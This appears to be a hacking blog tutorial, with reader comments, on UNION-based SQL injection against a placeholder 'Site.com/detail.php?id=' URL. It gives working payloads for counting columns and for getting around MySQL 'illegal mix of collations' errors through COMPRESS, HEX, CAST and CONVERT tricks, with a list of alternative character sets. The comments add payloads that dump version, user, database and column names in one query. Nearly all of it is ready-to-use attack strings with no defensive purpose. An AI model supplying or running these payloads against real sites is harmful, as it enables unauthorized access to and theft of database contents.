Bypassing illegal Mix of Collations- Tutorial by RAi Jee
We Will Continue our Tutorials About SQL.
In this Tutorial You Will Learn How to Bypass illegal Mix of Collations.
Lets start with our Regular SQL injection.
Our Target.
http://www.Site.com/detail.php?id=31
First we have to Count How Many Columns it have.
http://www.Site.com/detail.php?id=31 order by 1-- -
No Error !
http://www.Site.com/detail.php?id=31 order by 4-- -
No Error !
http://www.Site.com/detail.php?id=31 order by 6-- -
We Got Error Here.
Unknown Column '6' in 'order by'
Lets Reduce the Column Count.
http://www.Site.com/detail.php?id=31 order by 5-- -
No Error !
There are 5 Columns so let's Prepare our UNION SELECT Command and Find Vulnerable Columns.
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,2,3,4,5-- -
We Got 2 and 3.
Lets try to Get The Tables.
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -
Ooops !! we got Error Here .
Illegal mix of collations for operation 'UNION'
Here Some Methods which we can use to Bypass illegal mix of collations for operation 'UNION'
.1 Using UNCOMPRESS(COMPRESS(our_query_here))
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -
BYPASSED !!
.2 Using UNHEX(HEX(our_query_here))
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,unhex(hex(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -
BYPASSED !!
.3 Using CAST()
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,cast(table_name as binary),3,4,5 from information_schema.tables where table_schema=database()-- -
BYPASSED !!
.4 Using CONVERT()
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,convert(table_name using ascii),3,4,5 from information_schema.tables where table_schema=database()-- -
BYPASSED !!
SOME ADVANCE Methods for CONVERT()
In CONVERT() Function if ascii doesn't work then we can use these Functions instead of ascii.
- ujis
- ucs2
- tis620
- swe7
- sjis
- macroman
- macce
- latin7
- latin5
- latin2
- koi8u
- koi8r
- keybcs2
- hp8
- geostd8
- gbk
- gb2132
- armscii8
- ascii
- cp1250
- big5
- cp1251
- cp1256
- cp1257
- cp850
- cp852
- cp866
- cp932
- dec8
- euckr
- latin1
AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee
How to print database version and username in that method ? or i will just add
ReplyDeletehttp://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(version(),compress(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -
Like that?
USE THIS Query For Printing the Database,Version and User in One Shot .
Deletehttp://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(Version(),0x3a,user(),0x3a,database()))),3,4,5-- -
and if you want to Dump the Tables and Columns Too then PUT this one Query in the Vulnerable column:
Deletehttp://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(Version(),0x3a,user(),0x3a,database(),(select group_concat(column_name) from information_schema.columns where table_schema=database())))),3,4,5-- -
how to dump in waf bypass?
ReplyDeleteThis comment has been removed by the author.
ReplyDeletei want to learn sql injection from you, do you have any video lecture series.
ReplyDelete